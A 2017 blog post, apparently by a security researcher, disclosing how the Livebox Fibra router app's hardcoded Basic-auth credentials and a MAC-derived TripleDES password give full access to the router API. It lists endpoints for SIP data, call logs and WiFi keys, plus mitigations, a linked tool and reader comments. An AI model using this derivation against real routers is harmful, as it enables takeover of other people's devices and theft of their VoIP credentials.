jueves, 21 de septiembre de 2017

Full Remote Control Livebox Fibra Router Orange and Jazztel Spain


Recently Jazztel (my ISP) replaced the router I was using (ZTE H218N) with a new router known as "Livebox Fibra". This new router is used by Jazztel and Orange here in Spain. A lot of people have been trying to extract the SIP data and the ONT password in order to configure other custom routers. There are some public ways to root the router, but we are not going to talk about that in this blog post.

In this blog post, I am going to introduce you a security issue with this router that allows an attacker to take full control of the router if the router web server is exposed to the Internet or if the attacker is connected to the router (for example by using a malicious app in the smartphone of the owner of the router).

The router provides a web page to configure it.


But you can also use an iOS and Android app to configure the router (called "Mi Livebox"):


The first time I started the app, I was surprised because the app showed the router status without asking me for a user and password. Also, I was able to modify some router params without having to put any user or password. I thought: "I need to know what magic way it is using to do this!" ;P

I configured Burp Proxy on my phone and started to see the traffic..





Do you see that? No? It is using Basic HTTP Auth! But what is it using as user and password?

base64decode('[AUTH_HEADER]') = ApiUsr:ApiUsrPass

So it is using a harcoded user and password!!
But it only uses this user and password in the first call to the router API (http://192.168.1.1/API/WAN).. The router returns the MAC address and other general information. The rest of API endpoints does not work with this user and password..


If we see the rest of the request to the API, we can see that It uses another auth info in all the rest of requests.. If we decode this Base64 string, we obtain the following:
UsrAdmin:[Some Trash]

So it seems that the password for the "UsrAdmin" user is generated with some other data.. I said: "Ok, let's decompile and reverse engineer the APK" ;P

In com/orange/milivebox/es/main/utils/Utils.smali we find the function "lambda$getCredentialsAPIrouter$0" that receives as params the MAC address of the router and a variable called "secret", whose value is "MiLiveBoxApp".



This function does the following:
  1. Removes the ":" in the MAC address. cleanedMac = mac.replace(":","")
  2. Generates the MD5 of the "secret" variable ("MiLiveBoxApp")
  3. To the MD5 value, it appends the first 16 chars of the MD5. MD5("MiLiveBoxApp") = "62ea048211246ab16d2ef5729b7520ad"; so finally key="62ea048211246ab16d2ef5729b7520ad62ea048211246ab1".
  4. It encrypts the cleanedMac using TripleDES ECB using the generated key as key.
Now, we know how the app and the router generate the password, so now we can generate the password and make requests to configure whatever we want in the router! An attacker could just create a malicious app to steal your SIP data (accesible in the endpoint http://192.168.1.1/API/VoIP/SIP/Lines/) or get your calls log (http://192.168.1.1/API/CallRegistry) or get/set your WiFi password (http://192.168.1.1/API/LAN/WIFI/) or whatever he want.

You can get a list of the available endpoints in: http://192.168.1.1/API/Capabilities

There is also a "UsrOrange" user with the same password than "UsrAdmin". It is also allowed to access to the API. It seems like a special user for support.

What to do if you are a customer / How to protect yourself

The latest version of the firmware is: "AR_LBFIBRA_sp-00.03.04.112S(Thu Aug 31 17:59:39 2017)". There is no fix for this issue, so you have to protect yourself.
  1. Do not expose your router to the internet. Check your NAT config on your router. There are an important number of routers exposed on Shodan..
  2. The endpoint "http:/192.168.1.1/API/Access/LanApi" (for UsrAdmin) and "http:/192.168.1.1/API/Access/OspApi" (for UsrOrange) accept "GET" and "PUT" requests. GET gives you the password for UsrAdmin and UsrOrange, but you can change it by sending a "PUT" request with the following body (and reboot your router):
    1. http:/192.168.1.1/API/Access/LanApi: For UsrAdmin: {"User":"UsrAdmin","Password":"NewPassword"}
    2. http:/192.168.1.1/API/Access/OspApi: For UsrAdmin: {"User":"UsrOrange","Password":"NewPassword"}
  3. Configure another router

Tools

Since there are a lot of people that want to extract their SIP data to configure other routers, I have developed a small tool in Java to extract the SIP data from the router using this security issue. This tool also gives you the possibility of changing your UsrAdmin and UsrOrange password to protect you of malicious apps.

You can download and check the source code here: https://github.com/segura2010/LiveboxFibraExtractor

I hope you liked this blog post! See you in the next post!

10 comentarios:

  1. Hi there, I'm getting this error, java.lang.RuntimeException: java.lang.RuntimeException: org.json.JSONException: A JSONArray text must start with '[' at 1 [character 2 line 1]
    Do you know what could this mean? Seems like something is out of place, please advice...

    ResponderEliminar
  2. Me gusta mucho el título de tu blog. Está bien pensado. Además buenos consejos. Saludos

    ResponderEliminar
  3. La seguridad, sobre todo para las empresas es muy importante. He conocido gente que, por ser buena o no entender del asunto dejo su web en malas manos y se la quitaron.

    ResponderEliminar
  4. Estimado Alberto, Al parecer ya no se tiene acceso a la url de la api que explota tu app. Me hes imposible poder sacar los datos SIP, por favor, podrías comprobar si esto es cierto? Muchas gracias de antemano por tu tiempo ;-)

    ResponderEliminar
  5. Buenas Alberto, se puede utilizar tu herramienta para sacar la información SIP de un Livebox 2.1

    ResponderEliminar
  6. Hola Alberto, tenemos noticias para la nueva actualización.

    ResponderEliminar
  7. Hola Alberto, gran tabajo el tuyo, ojala saques algo pronto estoy ya desesperado por quitarme el livebox de encima. Gracias.

    ResponderEliminar
  8. Hola, y alguna forma para poder cambiar los DNS que están bloqueados, sería de gran ayuda.
    Un saludo.

    ResponderEliminar